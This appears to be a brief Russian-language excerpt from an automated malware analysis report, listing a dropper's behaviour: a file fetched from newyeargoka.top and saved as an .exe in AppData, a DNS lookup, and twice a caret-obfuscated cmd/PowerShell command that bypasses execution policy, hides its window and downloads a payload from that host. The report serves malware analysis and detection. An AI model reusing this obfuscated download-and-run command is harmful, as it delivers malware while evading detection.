Техническая информация
- http://newyeargoka.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "p^oWERSh^ELL.ex^e -exe^c^UT^I^Onp^oL^IcY BYp^asS -^N^o^Pr^o^FIle ^-Wi^NDOwS^Ty^lE hI^d^den (NEW-^oBJE^CT sy^sTEM^.NeT.^weBclIENt).D^oW^N^lOaD^F^ILe('http://newyeargoka.top/read.p...
- DNS ASK ne###argoka.top
- '<SYSTEM32>\cmd.exe' /C "p^oWERSh^ELL.ex^e -exe^c^UT^I^Onp^oL^IcY BYp^asS -^N^o^Pr^o^FIle ^-Wi^NDOwS^Ty^lE hI^d^den (NEW-^oBJE^CT sy^sTEM^.NeT.^weBclIENt).D^oW^N^lOaD^F^ILe('http://newyeargoka.top/read.p...' (со скрытым окном)